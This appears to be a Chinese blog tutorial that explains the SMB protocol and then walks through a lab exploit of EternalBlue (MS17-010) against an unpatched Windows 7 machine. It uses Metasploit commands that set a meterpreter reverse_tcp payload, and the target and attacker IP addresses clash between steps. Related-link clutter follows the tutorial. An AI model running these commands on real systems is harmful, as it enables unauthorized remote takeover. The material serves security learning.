一,SMB服务

  1. SMB(全称为Server Message Block)是一个协议名,可用于在计算机间共享文件、打印机,串口等,电脑上的网上邻居就是靠他实现的;

  2. SMB是一个应用层协议,可以工作在NETBIOS协议之上(TCP/139)或者TCP协议(TCP/445)之上;

  3. SMB协议和NETBIOS协议在Windows主机默认安装;

  4. SMB版本最新的是3.X,win7和vista是2.X。winXP是1.0主要的漏洞是由新版本的操作系统保持向下兼容带来,也就是说win10主机和winXP主机通过网络共享文件用的是SMB1.0协议;

  5. SMB是一种客户机/服务器,请求/响应协议。通过SMB协议,客户端应用程序可以在各种网络环境下读、写服务器上的文件,以及对服务器程序提出服务请求;

  6. SMB工作过程:版本协商——>客户端连接服务器认证——>客户端访问资源鉴定——>对共享资源进行操作;

  7. 微软官方文档[MS-SMB2]里提到SMBv2和SMBv3可统称为SMB 2协议,所以在Wireshark以及其他工具中便将高于smb2.0之后的协议统一为smb2。如果设备间使用了smbv3中新特性RDMA功能的则显示为SMBDirect协议;

  8. 配置SMB服务就是启动网络发现和打印机共享(如果网络设备为公用默认不开启时,则需要手动开启);

  9. 如果在Windows和Windows server中检测,启动和禁止SMBv1、SMB
    v2和SMBv3请参考微软官方指南:
    https://support.microsoft.com/zh-cn/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and

  10. 利用kali可对著名的SMB漏洞——永恒之蓝,进行检测和利用;
    https://blog.csdn.net/qq_36374896/article/details/81806764

  11. kali虚拟机镜像下载免费安装(免安装):
    VM Homepage: https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/

SMB——永恒之蓝漏洞利用

一,实验环境

攻击机:kali
被攻击机:win7(未装补丁)或者Windows2008(于win7的步骤相同)

二,实验步骤

1、获取IP地址(通过ifconfig和ipconfig命令)

  • kali-linux:192.168.139.139
  • Windows7:192.168.139.2


    2、通过“控制面板”——>“网络和Internet”——>“网络和共享中心”——>“更改高级共享设置”:启动打印机共享

3、kali-Linux输入msfconsole启动msf(若不是root登录,需sudo提升权限)

命令:root@kali:~# msfconsole

命令提示,显示msf启动成功

4、使用永恒之蓝漏洞

msf > use exploit/windows/smb/ms17_010_eternalblue


5、设置TCP连接

msf exploit (windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

6,设置靶机IP和操作机IP
操作机kali-Linux的——IP地址:192.168.139.139

靶机Windows7的——IP地址:192.168.139.129

msf exploit (windows/smb/ms17_010_eternalblue) > set rhost 192.168.18.130 msf exploit (windows/smb/ms17_010_eternalblue) > set lhost 192.168.18.129

7、进行攻击

msf exploit (windows/smb/ms17_010_eternalblue) > run


8、进行测试:

已获得Windows管理员权限!

SMB协议与永恒之蓝漏洞利用相关推荐

  1. 永恒之蓝漏洞利用(MS17-010)获取shell 及获取靶机屏幕截图

    永恒之蓝漏洞利用(MS17-010) 文章目录 永恒之蓝漏洞利用(MS17-010) 一.永恒之蓝(MS17-010)介绍 二.漏洞利用 1.检测目标主机是否存在MS17-010漏洞 2.使用msf攻 ...

  2. MSF之ms17-010永恒之蓝漏洞利用

    MSF之ms17-010永恒之蓝漏洞利用 准备 扫描漏洞 漏洞攻击 准备 实验准备环境: 被攻击机:虚拟机win7x64位系统,其IP为:10.101.2.11(关闭了防火墙) 攻击机:虚拟机kali ...

  3. MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

    漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口) 2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:19 ...

  4. 利用永恒之蓝入侵服务器复制文件,永恒之蓝漏洞利用复现(示例代码)

    一.环境搭建: IP地址 系统信息 备注 角色 192.168.0.244 win7旗舰版(未安装MS17-010补丁版本) 需开启445端口及SMB协议 靶机 192.168.0.105 win7旗 ...

  5. 永恒之蓝漏洞利用及攻击

    一.基础知识介绍: 1.何为永恒之蓝? 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机.甚 ...

  6. 永恒之蓝漏洞利用攻击以及修复方法

    靶机:Windows 7(有的版本有补丁) 攻击机:Kali 2021 首先保证可以互相ping 通 32位系统进去控制台会蓝屏 漏洞利用 用nmap的漏洞扫描模式,扫描过程按上下方向键即可查看扫描进 ...

  7. MS17-010永恒之蓝-漏洞利用+修复方法

    前言 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生. 该病毒是不法分子利用NSA(National Security Agenc ...

  8. 永恒之蓝漏洞ms17-010

    本示例主要提供学习使用,不得用于违法犯罪 目录 什么是永恒之蓝 漏洞复现: 1.信息收集 2.进入MSF利用永恒之蓝漏洞模块 3.后渗透阶段 什么是永恒之蓝 永恒之蓝是指2017年4月14日晚,黑客团 ...

  9. 永恒之蓝漏洞复现(ms17-010)----保姆级教程

    攻击机: kali Linux             靶机: win7 x64 提示:  复现攻击前请关闭杀毒软件 1.复现第一步按以下操作打开 445端口: 在 "运行" 里输 ...

最新文章

  1. Qt pro使用sql之类的需要添加的模块
  2. Mysql分组合并函数并进行数据列处理
  3. vue怎么运行html,怎样运行一个vue.js项目
  4. android studio 运行 Java Application
  5. Linux--内核Uevent事件机制 与 Input子系统【转】
  6. IDT系列:(二)中断处理过程,使用bochs调试IDT中的中断服务程序
  7. 华为荣耀20和x10比较_荣耀X10和华为畅享20plus,到底哪个更值得入手?
  8. avalon2框架应用注意事项
  9. 优化一个奇葩表设计上的全表扫描SQL
  10. java 25 - 2 网络编程之 网络通信三要素
  11. cocos tiledmap无法显示 不显示 无法加载
  12. 使用python爬取App安卓应用商店评论并生成词云
  13. SAS硬盘优缺点概述
  14. 关于springboot的配置注册循序问题
  15. java后台将数据导出到Excel表格
  16. STM32F103ZET6开发板实现跑马灯实验
  17. web前端知识——iframe标签、CSS
  18. 趣图:程序员到底是一群什么样的人?
  19. vscode的下载速度会特别慢问题处理
  20. 【观察】助力汽车行业自我迭代背后 SAP的定力、能力与合力

热门文章

  1. RedisTemplate报空指针错误
  2. 三星折叠屏手机之后 人们展开了对折叠iPhone的幻想
  3. netsuite与首信易支付(v4.3)接口
  4. Unity 音效管理器编辑窗口的创建和Manager的创建
  5. 游戏原画培训机构排名
  6. FND_MESSAGE使用
  7. 使用Eclipse UML 插件 Papyrus由Java代码反向生成类图
  8. Encoder-Decoder LSTM模型对家庭用电进行多步时间序列预测(多变量输入)
  9. 《C语言程序设计》一 2.5 案例学习——华氏温度与摄氏温度的转换
  10. 拉格朗日松弛与分解学习笔记2023.3.8